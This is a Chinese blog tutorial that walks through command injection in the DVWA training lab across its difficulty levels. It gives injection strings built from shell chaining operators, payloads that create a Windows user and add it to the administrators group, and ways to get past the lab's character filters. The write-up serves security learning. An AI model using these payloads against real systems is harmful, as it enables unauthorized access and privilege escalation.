DVWA(三)命令注入

ps来源网上:
1.ping命令
ping ip地址 :测试该ip是否在线
ping -n 2 ip地址:Windows系统,发送两次ping包命令。
ping -c 2 ip地址:Linux系统,发送两次ping包命令。
ping 127.0.0.1 :测试本地tcp/ip服务是否正常工作

2.ipconfig命令
ipconfig:Windows系统查看本机ip的命令
ifconfig:Linux系统查看本机ip的命令

3.net user
net user 用户名 密码 /add :Windows系统添加用户命令
net localgroup administrators 用户名 /add:将该用户添加到超级管理员组

4.连接符
ping 127.0.0.1 && ipconfig :如果成功执行第一个命令,则继续执行第二个命令
ping 127.0.0.1 & ipconfig:第一个命令无论执行成功与否,都继续执行第二个命令
ping 127.0.0.1 || ipconfig:第一个命令成功执行,则第二个命令不执行。若第一个命令执行错误,则执行后面命令。
ping 127.0.0.1 | ipconfig:第一个命令无论正确与否,都只执行第二个命令
ping 127.0.0.1 ;ipconfig:Linux系统下的命令,执行第一个和第二个命令。

老规矩我们安全性由低到高走一波

low级别

在这里插入图片描述我们先查看网页源代码
在这里插入图片描述安全程度为低的源码:
在这里插入图片描述我们可以看出该代码是用户输入的 ip 赋值给$target,直接执行ping $target,中间不做任何过滤处理。
这里我们考虑看能不能执行ipconfig命令从而知道该主机的IP地址。
所以我们尝试输入:
127.0.0.1 && ipconfig
127.0.0.1 & ipconfig
127.0.0.1 | ipconfig
127.0.0.1 ; ifconfig
然后得到如下
在这里插入图片描述我们发现该漏洞就可以利用这个注入点,为系统创建一个新的用户,并赋予管理员权限。我们输入添加用户的命令
127.0.0.1 && net user test test/add

127.0.0.1&& net localgroup administrators test/add
因为这次是我的本地的靶场然后就出现以下尴尬的场面,火绒直接给我拦了。在这里插入图片描述
在这里插入图片描述

所以这个靶场最好安在虚拟机上,要不靶场泄露了,就极有可能被黑客入侵。
在这里插入图片描述我们创建了账号为test 密码为test 的用户,输入net user test,发现该用户目前在user组中.
执行第二条命令加入超级管理员组,拥有了超级管理员权限。
记得到最后输入127.0.0.1&&net user test /del命令删除创建的用户。
在这里插入图片描述

同理这里可以考虑用burp进行抓包,对输入项进行爆破。

现在提高难度Meduim级别

看源码
在这里插入图片描述
这里我们发现他对&&和;进行了过滤,我们这里考虑用其他符号绕过,
这里我们发现使用&、|、||可以绕过。
所以命令改为
127.0.0.1 & ipconfig
127.0.0.1 || ipconfig
127.0.0.1 | ipconfig

high级别

源码
在这里插入图片描述这里我们就看出相较于上一个这个过滤的符号更多了。但我们发现,基本上所有的关键字都被过滤了,但是在“| ",多加了一个空格,导致我们输入|不加空格,是可以绕开的。
所以我们命令改为:
127.0.0.1|ipconfig (|后不加空格)

最后我们看看Impossible级别的

源码
在这里插入图片描述明白为什么是impossible了吧!☠

©️2020 CSDN 皮肤主题: 1024 设计师:上身试试 返回首页